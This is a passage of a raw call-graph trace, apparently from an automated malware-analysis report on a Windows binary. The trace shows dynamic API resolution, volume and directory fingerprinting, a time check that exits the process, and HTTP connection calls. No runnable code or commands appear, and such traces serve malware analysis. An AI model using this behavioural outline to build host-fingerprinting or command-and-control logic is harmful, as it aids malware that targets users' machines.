lstrcat 78964->78966 78966->78963 78967 417024 78967->78796 78969 416ebb 78968->78969 78970 416f0b 78969->78970 78971 416ef9 lstrcpy 78969->78971 78970->78807 78971->78970 79135 4134e0 78972->79135 78974 41364e 78975 413658 sscanf 78974->78975 79164 416e00 78975->79164 78977 41366a SystemTimeToFileTime SystemTimeToFileTime 78978 4136a0 78977->78978 78979 41368e 78977->78979 78981 412bb0 78978->78981 78979->78978 78980 413698 ExitProcess 78979->78980 78982 412bbd 78981->78982 78983 416d40 lstrcpy 78982->78983 78984 412bcb 78983->78984 79166 416e20 lstrlen 78984->79166 78987 416e20 2 API calls 78988 412bed 78987->78988 78989 416e20 2 API calls 78988->78989 78990 412bfa 78989->78990 78991 416e20 2 API calls 78990->78991 78992 412c07 78991->78992 79170 402590 78992->79170 78997 416e20 2 API calls 78998 412cd5 78997->78998 78999 416fb0 4 API calls 78998->78999 79000 412ceb 78999->79000 79001 416ea0 lstrcpy 79000->79001 79002 412cf4 79001->79002 79003 416d40 lstrcpy 79002->79003 79004 412d11 79003->79004 79005 416fb0 4 API calls 79004->79005 79006 412d2a 79005->79006 79007 416ea0 lstrcpy 79006->79007 79008 412d36 79007->79008 79009 416fb0 4 API calls 79008->79009 79010 412d5a 79009->79010 79011 416ea0 lstrcpy 79010->79011 79012 412d66 79011->79012 79013 416d40 lstrcpy 79012->79013 79014 412d8b 79013->79014 79814 4141c0 GetWindowsDirectoryA 79014->79814 79017 416da0 lstrcpy 79018 412da2 79017->79018 79824 404540 79018->79824 79020 412da8 79969 40fae0 79020->79969 79022 412db0 79023 416d40 lstrcpy 79022->79023 79024 412dd3 79023->79024 79987 401500 79024->79987 79028 412de7 80142 40f3b0 79028->80142 79030 412def 79031 416d40 lstrcpy 79030->79031 79032 412e13 79031->79032 79033 401500 lstrcpy 79032->79033 79034 412e21 79033->79034 79035 405610 37 API calls 79034->79035 79036 412e27 79035->79036 80149 40f200 79036->80149 79038 412e2f 79039 401500 lstrcpy 79038->79039 79040 412e40 79039->79040 80159 40fd10 79040->80159 79042 412e45 79043 416d40 lstrcpy 79042->79043 79044 412e5e 79043->79044 80503 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 79044->80503 79046 412e63 79047 401500 lstrcpy 79046->79047 79048 412ed0 79047->79048 80510 40ef80 79048->80510 79050 412ed5 79051 416d40 lstrcpy 79050->79051 79052 412ef8 79051->79052 79053 401500 lstrcpy 79052->79053 79119 4043db 79118->79119 79120 4043ec strlen 79119->79120 79121 402144 79119->79121 79120->79119 79121->78820 79122->78906 79124 401082 moneypunct 79123->79124 79125 4010bd 79124->79125 79126 4010a2 VirtualFree 79124->79126 79125->78936 79126->79125 79128 4011f3 GlobalMemoryStatusEx 79127->79128 79128->78939 79129->78955 79130->78962 79132 416dc2 79131->79132 79133 416dec 79132->79133 79134 416dda lstrcpy 79132->79134 79133->78967 79134->79133 79136 416d40 lstrcpy 79135->79136 79137 4134f3 79136->79137 79138 416fb0 4 API calls 79137->79138 79139 413505 79138->79139 79140 416ea0 lstrcpy 79139->79140 79141 41350e 79140->79141 79142 416fb0 4 API calls 79141->79142 79143 413527 79142->79143 79144 416ea0 lstrcpy 79143->79144 79145 413530 79144->79145 79146 416fb0 4 API calls 79145->79146 79147 41354a 79146->79147 79148 416ea0 lstrcpy 79147->79148 79149 413553 79148->79149 79150 416fb0 4 API calls 79149->79150 79151 41356c 79150->79151 79152 416ea0 lstrcpy 79151->79152 79153 413575 79152->79153 79154 416fb0 4 API calls 79153->79154 79155 41358f 79154->79155 79156 416ea0 lstrcpy 79155->79156 79157 413598 79156->79157 79158 416fb0 4 API calls 79157->79158 79159 4135b3 79158->79159 79160 416ea0 lstrcpy 79159->79160 79161 4135bc 79160->79161 79162 416da0 lstrcpy 79161->79162 79163 4135d0 79162->79163 79163->78974 79165 416e12 79164->79165 79165->78977 79167 416e3f 79166->79167 79168 412be0 79167->79168 79169 416e7b lstrcpy 79167->79169 79168->78987 79169->79168 79171 4043b0 2 API calls 79170->79171 79172 4025a4 79171->79172 79173 4043b0 2 API calls 79172->79173 79174 4025bd 79173->79174 79175 4043b0 2 API calls 79174->79175 79176 4025d6 79175->79176 79177 4043b0 2 API calls 79176->79177 79178 4025ef 79177->79178 79179 4043b0 2 API calls 79178->79179 79180 402608 79179->79180 79181 4043b0 2 API calls 79180->79181 79182 402621 79181->79182 79183 4043b0 2 API calls 79182->79183 79184 40263a 79183->79184 79185 4043b0 2 API calls 79184->79185 79186 402653 79185->79186 79187 4043b0 2 API calls 79186->79187 79188 40266c 79187->79188 79189 4043b0 2 API calls 79188->79189 79190 402685 79189->79190 79191 4043b0 2 API calls 79190->79191 79192 40269e 79191->79192 79193 4043b0 2 API calls 79192->79193 79194 4026b7 79193->79194 79195 4043b0 2 API calls 79194->79195 79196 4026d0 79195->79196 79197 4043b0 2 API calls 79196->79197 79198 4026e9 79197->79198 79199 4043b0 2 API calls 79198->79199 79200 402702 79199->79200 79201 4043b0 2 API calls 79200->79201 79202 40271b 79201->79202 79203 4043b0 2 API calls 79202->79203 79204 402734 79203->79204 79205 4043b0 2 API calls 79204->79205 79206 40274d 79205->79206 79207 4043b0 2 API calls 79206->79207 79208 402766 79207->79208 79209 4043b0 2 API calls 79208->79209 79210 40277f 79209->79210 79211 4043b0 2 API calls 79210->79211 79212 402798 79211->79212 79213 4043b0 2 API calls 79212->79213 79214 4027b1 79213->79214 79215 4043b0 2 API calls 79214->79215 79216 4027ca 79215->79216 79217 4043b0 2 API calls 79216->79217 79218 4027e3 79217->79218 79219 4043b0 2 API calls 79218->79219 79220 4027fc 79219->79220 79221 4043b0 2 API calls 79220->79221 79222 402815 79221->79222 79223 4043b0 2 API calls 79222->79223 79224 40282e 79223->79224 79225 4043b0 2 API calls 79224->79225 79226 402847 79225->79226 79227 4043b0 2 API calls 79226->79227 79228 402860 79227->79228 79229 4043b0 2 API calls 79228->79229 79230 402879 79229->79230 79231 4043b0 2 API calls 79230->79231 79232 402892 79231->79232 79233 4043b0 2 API calls 79232->79233 79234 4028ab 79233->79234 79235 4043b0 2 API calls 79234->79235 79236 4028c4 79235->79236 79237 4043b0 2 API calls 79236->79237 79238 4028dd 79237->79238 79239 4043b0 2 API calls 79238->79239 79240 4028f6 79239->79240 79241 4043b0 2 API calls 79240->79241 79242 40290f 79241->79242 79243 4043b0 2 API calls 79242->79243 79244 402928 79243->79244 79245 4043b0 2 API calls 79244->79245 79246 402941 79245->79246 79247 4043b0 2 API calls 79246->79247 79248 40295a 79247->79248 79249 4043b0 2 API calls 79248->79249 79250 402973 79249->79250 79251 4043b0 2 API calls 79250->79251 79252 40298c 79251->79252 79253 4043b0 2 API calls 79252->79253 79254 4029a5 79253->79254 79255 4043b0 2 API calls 79254->79255 79256 4029be 79255->79256 79257 4043b0 2 API calls 79256->79257 79258 4029d7 79257->79258 79259 4043b0 2 API calls 79258->79259 79260 4029f0 79259->79260 79261 4043b0 2 API calls 79260->79261 79262 402a09 79261->79262 79263 4043b0 2 API calls 79262->79263 79264 402a22 79263->79264 79265 4043b0 2 API calls 79264->79265 79266 402a3b 79265->79266 79267 4043b0 2 API calls 79266->79267 79268 402a54 79267->79268 79269 4043b0 2 API calls 79268->79269 79270 402a6d 79269->79270 79271 4043b0 2 API calls 79270->79271 79272 402a86 79271->79272 79273 4043b0 2 API calls 79272->79273 79274 402a9f 79273->79274 79275 4043b0 2 API calls 79274->79275 79276 402ab8 79275->79276 79277 4043b0 2 API calls 79276->79277 79278 402ad1 79277->79278 79279 4043b0 2 API calls 79278->79279 79280 402aea 79279->79280 79281 4043b0 2 API calls 79280->79281 79282 402b03 79281->79282 79283 4043b0 2 API calls 79282->79283 79284 402b1c 79283->79284 79285 4043b0 2 API calls 79284->79285 79286 402b35 79285->79286 79287 4043b0 2 API calls 79286->79287 79288 402b4e 79287->79288 79289 4043b0 2 API calls 79288->79289 79290 402b67 79289->79290 79291 4043b0 2 API calls 79290->79291 79292 402b80 79291->79292 79293 4043b0 2 API calls 79292->79293 79294 402b99 79293->79294 79295 4043b0 2 API calls 79294->79295 79296 402bb2 79295->79296 79297 4043b0 2 API calls 79296->79297 79298 402bcb 79297->79298 79299 4043b0 2 API calls 79298->79299 79300 402be4 79299->79300 79301 4043b0 2 API calls 79300->79301 79302 402bfd 79301->79302 79303 4043b0 2 API calls 79302->79303 79304 402c16 79303->79304 79305 4043b0 2 API calls 79304->79305 79306 402c2f 79305->79306 79307 4043b0 2 API calls 79306->79307 79308 402c48 79307->79308 79309 4043b0 2 API calls 79308->79309 79310 402c61 79309->79310 79311 4043b0 2 API calls 79310->79311 79312 402c7a 79311->79312 79313 4043b0 2 API calls 79312->79313 79314 402c93 79313->79314 79315 4043b0 2 API calls 79314->79315 79316 402cac 79315->79316 79317 4043b0 2 API calls 79316->79317 79318 402cc5 79317->79318 79319 4043b0 2 API calls 79318->79319 79320 402cde 79319->79320 79321 4043b0 2 API calls 79320->79321 79322 402cf7 79321->79322 79323 4043b0 2 API calls 79322->79323 79324 402d10 79323->79324 79325 4043b0 2 API calls 79324->79325 79326 402d29 79325->79326 79327 4043b0 2 API calls 79326->79327 79328 402d42 79327->79328 79329 4043b0 2 API calls 79328->79329 79330 402d5b 79329->79330 79331 4043b0 2 API calls 79330->79331 79332 402d74 79331->79332 79333 4043b0 2 API calls 79332->79333 79334 402d8d 79333->79334 79335 4043b0 2 API calls 79334->79335 79336 402da6 79335->79336 79337 4043b0 2 API calls 79336->79337 79338 402dbf 79337->79338 79339 4043b0 2 API calls 79338->79339 79340 402dd8 79339->79340 79341 4043b0 2 API calls 79340->79341 79342 402df1 79341->79342 79343 4043b0 2 API calls 79342->79343 79344 402e0a 79343->79344 79345 4043b0 2 API calls 79344->79345 79346 402e23 79345->79346 79347 4043b0 2 API calls 79346->79347 79348 402e3c 79347->79348 79349 4043b0 2 API calls 79348->79349 79350 402e55 79349->79350 79351 4043b0 2 API calls 79350->79351 79352 402e6e 79351->79352 79353 4043b0 2 API calls 79352->79353 79354 402e87 79353->79354 79355 4043b0 2 API calls 79354->79355 79356 402ea0 79355->79356 79357 4043b0 2 API calls 79356->79357 79358 402eb9 79357->79358 79359 4043b0 2 API calls 79358->79359 79360 402ed2 79359->79360 79361 4043b0 2 API calls 79360->79361 79362 402eeb 79361->79362 79363 4043b0 2 API calls 79362->79363 79364 402f04 79363->79364 79365 4043b0 2 API calls 79364->79365 79366 402f1d 79365->79366 79367 4043b0 2 API calls 79366->79367 79368 402f36 79367->79368 79369 4043b0 2 API calls 79368->79369 79370 402f4f 79369->79370 79371 4043b0 2 API calls 79370->79371 79372 402f68 79371->79372 79373 4043b0 2 API calls 79372->79373 79374 402f81 79373->79374 79375 4043b0 2 API calls 79374->79375 79376 402f9a 79375->79376 79377 4043b0 2 API calls 79376->79377 79378 402fb3 79377->79378 79379 4043b0 2 API calls 79378->79379 79380 402fcc 79379->79380 79381 4043b0 2 API calls 79380->79381 79382 402fe5 79381->79382 79383 4043b0 2 API calls 79382->79383 79384 402ffe 79383->79384 79385 4043b0 2 API calls 79384->79385 79386 403017 79385->79386 79387 4043b0 2 API calls 79386->79387 79388 403030 79387->79388 79389 4043b0 2 API calls 79388->79389 79390 403049 79389->79390 79391 4043b0 2 API calls 79390->79391 79392 403062 79391->79392 79393 4043b0 2 API calls 79392->79393 79394 40307b 79393->79394 79395 4043b0 2 API calls 79394->79395 79396 403094 79395->79396 79397 4043b0 2 API calls 79396->79397 79398 4030ad 79397->79398 79399 4043b0 2 API calls 79398->79399 79400 4030c6 79399->79400 79401 4043b0 2 API calls 79400->79401 79402 4030df 79401->79402 79403 4043b0 2 API calls 79402->79403 79404 4030f8 79403->79404 79405 4043b0 2 API calls 79404->79405 79406 403111 79405->79406 79407 4043b0 2 API calls 79406->79407 79408 40312a 79407->79408 79409 4043b0 2 API calls 79408->79409 79410 403143 79409->79410 79411 4043b0 2 API calls 79410->79411 79412 40315c 79411->79412 79413 4043b0 2 API calls 79412->79413 79414 403175 79413->79414 79415 4043b0 2 API calls 79414->79415 79416 40318e 79415->79416 79417 4043b0 2 API calls 79416->79417 79418 4031a7 79417->79418 79419 4043b0 2 API calls 79418->79419 79420 4031c0 79419->79420 79421 4043b0 2 API calls 79420->79421 79422 4031d9 79421->79422 79423 4043b0 2 API calls 79422->79423 79424 4031f2 79423->79424 79425 4043b0 2 API calls 79424->79425 79426 40320b 79425->79426 79427 4043b0 2 API calls 79426->79427 79428 403224 79427->79428 79429 4043b0 2 API calls 79428->79429 79430 40323d 79429->79430 79431 4043b0 2 API calls 79430->79431 79432 403256 79431->79432 79433 4043b0 2 API calls 79432->79433 79434 40326f 79433->79434 79435 4043b0 2 API calls 79434->79435 79436 403288 79435->79436 79437 4043b0 2 API calls 79436->79437 79438 4032a1 79437->79438 79439 4043b0 2 API calls 79438->79439 79440 4032ba 79439->79440 79441 4043b0 2 API calls 79440->79441 79442 4032d3 79441->79442 79443 4043b0 2 API calls 79442->79443 79444 4032ec 79443->79444 79445 4043b0 2 API calls 79444->79445 79446 403305 79445->79446 79447 4043b0 2 API calls 79446->79447 79448 40331e 79447->79448 79449 4043b0 2 API calls 79448->79449 79450 403337 79449->79450 79451 4043b0 2 API calls 79450->79451 79452 403350 79451->79452 79453 4043b0 2 API calls 79452->79453 79454 403369 79453->79454 79455 4043b0 2 API calls 79454->79455 79456 403382 79455->79456 79457 4043b0 2 API calls 79456->79457 79458 40339b 79457->79458 79459 4043b0 2 API calls 79458->79459 79460 4033b4 79459->79460 79461 4043b0 2 API calls 79460->79461 79462 4033cd 79461->79462 79463 4043b0 2 API calls 79462->79463 79464 4033e6 79463->79464 79465 4043b0 2 API calls 79464->79465 79466 4033ff 79465->79466 79467 4043b0 2 API calls 79466->79467 79468 403418 79467->79468 79469 4043b0 2 API calls 79468->79469 79470 403431 79469->79470 79471 4043b0 2 API calls 79470->79471 79472 40344a 79471->79472 79473 4043b0 2 API calls 79472->79473 79474 403463 79473->79474 79475 4043b0 2 API calls 79474->79475 79476 40347c 79475->79476 79477 4043b0 2 API calls 79476->79477 79478 403495 79477->79478 79479 4043b0 2 API calls 79478->79479 79480 4034ae 79479->79480 79481 4043b0 2 API calls 79480->79481 79482 4034c7 79481->79482 79483 4043b0 2 API calls 79482->79483 79484 4034e0 79483->79484 79485 4043b0 2 API calls 79484->79485 79486 4034f9 79485->79486 79487 4043b0 2 API calls 79486->79487 79488 403512 79487->79488 79489 4043b0 2 API calls 79488->79489 79490 40352b 79489->79490 79491 4043b0 2 API calls 79490->79491 79492 403544 79491->79492 79493 4043b0 2 API calls 79492->79493 79494 40355d 79493->79494 79495 4043b0 2 API calls 79494->79495 79496 403576 79495->79496 79497 4043b0 2 API calls 79496->79497 79498 40358f 79497->79498 79499 4043b0 2 API calls 79498->79499 79500 4035a8 79499->79500 79501 4043b0 2 API calls 79500->79501 79502 4035c1 79501->79502 79503 4043b0 2 API calls 79502->79503 79504 4035da 79503->79504 79505 4043b0 2 API calls 79504->79505 79506 4035f3 79505->79506 79507 4043b0 2 API calls 79506->79507 79508 40360c 79507->79508 79509 4043b0 2 API calls 79508->79509 79510 403625 79509->79510 79511 4043b0 2 API calls 79510->79511 79512 40363e 79511->79512 79513 4043b0 2 API calls 79512->79513 79514 403657 79513->79514 79515 4043b0 2 API calls 79514->79515 79516 403670 79515->79516 79517 4043b0 2 API calls 79516->79517 79518 403689 79517->79518 79519 4043b0 2 API calls 79518->79519 79520 4036a2 79519->79520 79521 4043b0 2 API calls 79520->79521 79522 4036bb 79521->79522 79523 4043b0 2 API calls 79522->79523 79524 4036d4 79523->79524 79525 4043b0 2 API calls 79524->79525 79526 4036ed 79525->79526 79527 4043b0 2 API calls 79526->79527 79528 403706 79527->79528 79529 4043b0 2 API calls 79528->79529 79530 40371f 79529->79530 79531 4043b0 2 API calls 79530->79531 79532 403738 79531->79532 79533 4043b0 2 API calls 79532->79533 79534 403751 79533->79534 79535 4043b0 2 API calls 79534->79535 79536 40376a 79535->79536 79537 4043b0 2 API calls 79536->79537 79538 403783 79537->79538 79539 4043b0 2 API calls 79538->79539 79540 40379c 79539->79540 79541 4043b0 2 API calls 79540->79541 79542 4037b5 79541->79542 79543 4043b0 2 API calls 79542->79543 79544 4037ce 79543->79544 79545 4043b0 2 API calls 79544->79545 79546 4037e7 79545->79546 79547 4043b0 2 API calls 79546->79547 79548 403800 79547->79548 79549 4043b0 2 API calls 79548->79549 79550 403819 79549->79550 79551 4043b0 2 API calls 79550->79551 79552 403832 79551->79552 79553 4043b0 2 API calls 79552->79553 79554 40384b 79553->79554 79555 4043b0 2 API calls 79554->79555 79556 403864 79555->79556 79557 4043b0 2 API calls 79556->79557 79558 40387d 79557->79558 79559 4043b0 2 API calls 79558->79559 79560 403896 79559->79560 79561 4043b0 2 API calls 79560->79561 79562 4038af 79561->79562 79563 4043b0 2 API calls 79562->79563 79564 4038c8 79563->79564 79565 4043b0 2 API calls 79564->79565 79566 4038e1 79565->79566 79567 4043b0 2 API calls 79566->79567 79568 4038fa 79567->79568 79569 4043b0 2 API calls 79568->79569 79570 403913 79569->79570 79571 4043b0 2 API calls 79570->79571 79572 40392c 79571->79572 79573 4043b0 2 API calls 79572->79573 79574 403945 79573->79574 79575 4043b0 2 API calls 79574->79575 79576 40395e 79575->79576 79577 4043b0 2 API calls 79576->79577 79578 403977 79577->79578 79579 4043b0 2 API calls 79578->79579 79580 403990 79579->79580 79581 4043b0 2 API calls 79580->79581 79582 4039a9 79581->79582 79583 4043b0 2 API calls 79582->79583 79584 4039c2 79583->79584 79585 4043b0 2 API calls 79584->79585 79586 4039db 79585->79586 79587 4043b0 2 API calls 79586->79587 79588 4039f4 79587->79588 79589 4043b0 2 API calls 79588->79589 79590 403a0d 79589->79590 79591 4043b0 2 API calls 79590->79591 79592 403a26 79591->79592 79593 4043b0 2 API calls 79592->79593 79594 403a3f 79593->79594 79595 4043b0 2 API calls 79594->79595 79596 403a58 79595->79596 79597 4043b0 2 API calls 79596->79597 79598 403a71 79597->79598 79599 4043b0 2 API calls 79598->79599 79600 403a8a 79599->79600 79601 4043b0 2 API calls 79600->79601 79602 403aa3 79601->79602 79603 4043b0 2 API calls 79602->79603 79604 403abc 79603->79604 79605 4043b0 2 API calls 79604->79605 79606 403ad5 79605->79606 79607 4043b0 2 API calls 79606->79607 79608 403aee 79607->79608 79609 4043b0 2 API calls 79608->79609 79610 403b07 79609->79610 79611 4043b0 2 API calls 79610->79611 79612 403b20 79611->79612 79613 4043b0 2 API calls 79612->79613 79614 403b39 79613->79614 79615 4043b0 2 API calls 79614->79615 79616 403b52 79615->79616 79617 4043b0 2 API calls 79616->79617 79618 403b6b 79617->79618 79619 4043b0 2 API calls 79618->79619 79620 403b84 79619->79620 79621 4043b0 2 API calls 79620->79621 79622 403b9d 79621->79622 79623 4043b0 2 API calls 79622->79623 79624 403bb6 79623->79624 79625 4043b0 2 API calls 79624->79625 79626 403bcf 79625->79626 79627 4043b0 2 API calls 79626->79627 79628 403be8 79627->79628 79629 4043b0 2 API calls 79628->79629 79630 403c01 79629->79630 79631 4043b0 2 API calls 79630->79631 79632 403c1a 79631->79632 79633 4043b0 2 API calls 79632->79633 79634 403c33 79633->79634 79635 4043b0 2 API calls 79634->79635 79636 403c4c 79635->79636 79637 4043b0 2 API calls 79636->79637 79638 403c65 79637->79638 79639 4043b0 2 API calls 79638->79639 79640 403c7e 79639->79640 79641 4043b0 2 API calls 79640->79641 79642 403c97 79641->79642 79643 4043b0 2 API calls 79642->79643 79644 403cb0 79643->79644 79645 4043b0 2 API calls 79644->79645 79646 403cc9 79645->79646 79647 4043b0 2 API calls 79646->79647 79648 403ce2 79647->79648 79649 4043b0 2 API calls 79648->79649 79650 403cfb 79649->79650 79651 4043b0 2 API calls 79650->79651 79652 403d14 79651->79652 79653 4043b0 2 API calls 79652->79653 79654 403d2d 79653->79654 79655 4043b0 2 API calls 79654->79655 79656 403d46 79655->79656 79657 4043b0 2 API calls 79656->79657 79658 403d5f 79657->79658 79659 4043b0 2 API calls 79658->79659 79660 403d78 79659->79660 79661 4043b0 2 API calls 79660->79661 79662 403d91 79661->79662 79663 4043b0 2 API calls 79662->79663 79664 403daa 79663->79664 79665 4043b0 2 API calls 79664->79665 79666 403dc3 79665->79666 79667 4043b0 2 API calls 79666->79667 79668 403ddc 79667->79668 79669 4043b0 2 API calls 79668->79669 79670 403df5 79669->79670 79671 4043b0 2 API calls 79670->79671 79672 403e0e 79671->79672 79673 4043b0 2 API calls 79672->79673 79674 403e27 79673->79674 79675 4043b0 2 API calls 79674->79675 79676 403e40 79675->79676 79677 4043b0 2 API calls 79676->79677 79678 403e59 79677->79678 79679 4043b0 2 API calls 79678->79679 79680 403e72 79679->79680 79681 4043b0 2 API calls 79680->79681 79682 403e8b 79681->79682 79683 4043b0 2 API calls 79682->79683 79684 403ea4 79683->79684 79685 4043b0 2 API calls 79684->79685 79686 403ebd 79685->79686 79687 4043b0 2 API calls 79686->79687 79688 403ed6 79687->79688 79689 4043b0 2 API calls 79688->79689 79690 403eef 79689->79690 79691 4043b0 2 API calls 79690->79691 79692 403f08 79691->79692 79693 4043b0 2 API calls 79692->79693 79694 403f21 79693->79694 79695 4043b0 2 API calls 79694->79695 79696 403f3a 79695->79696 79697 4043b0 2 API calls 79696->79697 79698 403f53 79697->79698 79699 4043b0 2 API calls 79698->79699 79700 403f6c 79699->79700 79701 4043b0 2 API calls 79700->79701 79702 403f85 79701->79702 79703 4043b0 2 API calls 79702->79703 79704 403f9e 79703->79704 79705 4043b0 2 API calls 79704->79705 79706 403fb7 79705->79706 79707 4043b0 2 API calls 79706->79707 79708 403fd0 79707->79708 79709 4043b0 2 API calls 79708->79709 79710 403fe9 79709->79710 79711 4043b0 2 API calls 79710->79711 79712 404002 79711->79712 79713 4043b0 2 API calls 79712->79713 79714 40401b 79713->79714 79715 4043b0 2 API calls 79714->79715 79716 404034 79715->79716 79717 4043b0 2 API calls 79716->79717 79718 40404d 79717->79718 79719 4043b0 2 API calls 79718->79719 79720 404066 79719->79720 79721 4043b0 2 API calls 79720->79721 79722 40407f 79721->79722 79723 4043b0 2 API calls 79722->79723 79724 404098 79723->79724 79725 4043b0 2 API calls 79724->79725 79726 4040b1 79725->79726 79727 4043b0 2 API calls 79726->79727 79728 4040ca 79727->79728 79729 4043b0 2 API calls 79728->79729 79730 4040e3 79729->79730 79731 4043b0 2 API calls 79730->79731 79732 4040fc 79731->79732 79733 4043b0 2 API calls 79732->79733 79734 404115 79733->79734 79735 4043b0 2 API calls 79734->79735 79736 40412e 79735->79736 79737 4043b0 2 API calls 79736->79737 79738 404147 79737->79738 79739 4043b0 2 API calls 79738->79739 79740 404160 79739->79740 79741 4043b0 2 API calls 79740->79741 79742 404179 79741->79742 79743 4043b0 2 API calls 79742->79743 79744 404192 79743->79744 79745 4043b0 2 API calls 79744->79745 79746 4041ab 79745->79746 79747 4043b0 2 API calls 79746->79747 79748 4041c4 79747->79748 79749 4043b0 2 API calls 79748->79749 79750 4041dd 79749->79750 79751 4043b0 2 API calls 79750->79751 79752 4041f6 79751->79752 79753 4043b0 2 API calls 79752->79753 79754 40420f 79753->79754 79755 4043b0 2 API calls 79754->79755 79756 404228 79755->79756 79757 4043b0 2 API calls 79756->79757 79758 404241 79757->79758 79759 4043b0 2 API calls 79758->79759 79760 40425a 79759->79760 79761 4043b0 2 API calls 79760->79761 79762 404273 79761->79762 79763 4043b0 2 API calls 79762->79763 79764 40428c 79763->79764 79765 4043b0 2 API calls 79764->79765 79766 4042a5 79765->79766 79767 4043b0 2 API calls 79766->79767 79768 4042be 79767->79768 79769 4043b0 2 API calls 79768->79769 79770 4042d7 79769->79770 79771 4043b0 2 API calls 79770->79771 79772 4042f0 79771->79772 79773 4043b0 2 API calls 79772->79773 79774 404309 79773->79774 79775 4043b0 2 API calls 79774->79775 79776 404322 79775->79776 79777 4043b0 2 API calls 79776->79777 79778 40433b 79777->79778 79779 4043b0 2 API calls 79778->79779 79780 404354 79779->79780 79781 4043b0 2 API calls 79780->79781 79782 40436d 79781->79782 79783 4043b0 2 API calls 79782->79783 79784 404386 79783->79784 79785 4043b0 2 API calls 79784->79785 79786 40439f 79785->79786 79787 416240 79786->79787 79788 416250 43 API calls 79787->79788 79789 416666 8 API calls 79787->79789 79788->79789 79790 416776 79789->79790 79791 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79789->79791 79792 416783 8 API calls 79790->79792 79793 416846 79790->79793 79791->79790 79792->79793 79794 4168c8 79793->79794 79795 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79793->79795 79796 4168d5 6 API calls 79794->79796 79797 416967 79794->79797 79795->79794 79796->79797 79798 416974 9 API calls 79797->79798 79799 416a4f 79797->79799 79798->79799 79800 416ad2 79799->79800 79801 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79799->79801 79802 416adb GetProcAddress GetProcAddress 79800->79802 79803 416b0c 79800->79803 79801->79800 79802->79803 79804 416b45 79803->79804 79805 416b15 GetProcAddress GetProcAddress 79803->79805 79806 416b52 8 API calls 79804->79806 79807 416c15 79804->79807 79805->79804 79806->79807 79808 416c7f 79807->79808 79809 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79807->79809 79810 416ca1 79808->79810 79811 416c88 GetProcAddress 79808->79811 79809->79808 79812 412cc6 79810->79812 79813 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79810->79813 79811->79810 79812->78997 79813->79812 79815 4141f0 GetVolumeInformationA 79814->79815 79816 4141e9 79814->79816 79817 41422e 79815->79817 79816->79815 79818 414299 GetProcessHeap HeapAlloc 79817->79818 79819 4142c5 wsprintfA 79818->79819 79820 4142b6 79818->79820 79822 416d40 lstrcpy 79819->79822 79821 416d40 lstrcpy 79820->79821 79823 412d94 79821->79823 79822->79823 79823->79017 79825 416da0 lstrcpy 79824->79825 79826 404559 79825->79826 80844 404470 79826->80844 79828 404565 79829 416d40 lstrcpy 79828->79829 79830 404597 79829->79830 79831 416d40 lstrcpy 79830->79831 79832 4045a4 79831->79832 79833 416d40 lstrcpy 79832->79833 79834 4045b1 79833->79834 79835 416d40 lstrcpy 79834->79835 79836 4045be 79835->79836 79837 416d40 lstrcpy 79836->79837 79838 4045cb InternetOpenA StrCmpCA 79837->79838 79839 404604 79838->79839 79840 404b8b InternetCloseHandle 79839->79840 80856 415260 79839->80856 79842 404ba8 79840->79842 80871 4094a0 CryptStringToBinaryA 79842->80871 79843 404623 80864 416f20 79843->80864 79846 404636 79848 416ea0 lstrcpy 79846->79848 79853 40463f 79848->79853 79849 416e20 2 API calls 79850 404bc5 79849->79850 79851 416fb0 4 API calls 79850->79851 79854 404bdb 79851->79854 79852 404be7 moneypunct 79856 416da0 lstrcpy 79852->79856 79857 416fb0 4 API calls 79853->79857 79855 416ea0 lstrcpy 79854->79855 79855->79852 79869 404c17 79856->79869 79858 404669 79857->79858 79859 416ea0 lstrcpy 79858->79859 79860 404672 79859->79860 79861 416fb0 4 API calls 79860->79861 79862 404691 79861->79862 79863 416ea0 lstrcpy 79862->79863 79864 40469a 79863->79864 79865 416f20 3 API calls 79864->79865 79866 4046b8 79865->79866 79867 416ea0 lstrcpy 79866->79867 79868 4046c1 79867->79868 79870 416fb0 4 API calls 79868->79870 79869->79020 79871 4046e0 79870->79871 79872 416ea0 lstrcpy 79871->79872 79873 4046e9 79872->79873 79874 416fb0 4 API calls 79873->79874 79875 404708 79874->79875 79876 416ea0 lstrcpy 79875->79876 79877 404711 79876->79877 79878 416fb0 4 API calls 79877->79878 79879 40473d 79878->79879 79880 416f20 3 API calls 79879->79880 79881 404744 79880->79881 79882 416ea0 lstrcpy 79881->79882 79883 40474d 79882->79883 79884 404763 InternetConnectA 79883->79884 79884->79840 79885 404793 HttpOpenRequestA 79884->79885 79887 4047e8 79885->79887 79888 404b7e InternetCloseHandle 79885->79888 79889 416fb0 4 API calls 79887->79889 79888->79840 79890 4047fc 79889->79890 79891 416ea0 lstrcpy 79890->79891 79892 404805 79891->79892 79893 416f20 3 API calls 79892->79893 79894 404823 79893->79894 79895 416ea0 lstrcpy 79894->79895 79896 40482c 79895->79896 79897 416fb0 4 API calls 79896->79897 79898 40484b 79897->79898 79899 416ea0 lstrcpy 79898->79899 79900 404854 79899->79900 79901 416fb0 4 API calls 79900->79901 79902 404875 79901->79902 79903 416ea0 lstrcpy 79902->79903 79904 40487e 79903->79904 79905 416fb0 4 API calls 79904->79905 79906 40489e 79905->79906 79907 416ea0 lstrcpy 79906->79907 79908 4048a7 79907->79908 79909 416fb0 4 API calls 79908->79909 79910 4048c6 79909->79910 79911 416ea0 lstrcpy 79910->79911 79912 4048cf 79911->79912 79913 416f20 3 API calls 79912->79913 79914 4048ed 79913->79914 79915 416ea0 lstrcpy 79914->79915 79916 4048f6 79915->79916 79917 416fb0 4 API calls 79916->79917 79918 404915 79917->79918 79919 416ea0 lstrcpy 79918->79919 79920 40491e 79919->79920 79921 416fb0 4 API calls 79920->79921 79922 40493d 79921->79922 79923 416ea0 lstrcpy 79922->79923 79924 404946 79923->79924 79925 416f20 3 API calls 79924->79925 79926 404964 79925->79926 79927 416ea0 lstrcpy 79926->79927 79928 40496d 79927->79928 79929 416fb0 4 API calls 79928->79929 79930 40498c 79929->79930 79931 416ea0 lstrcpy 79930->79931 79932 404995 79931->79932 79933 416fb0 4 API calls 79932->79933 79934 4049b6 79933->79934 79935 416ea0 lstrcpy 79934->79935 79936 4049bf 79935->79936 79937 416fb0 4 API calls 79936->79937 79938 4049df 79937->79938 79939 416ea0 lstrcpy 79938->79939 79940 4049e8 79939->79940 79941 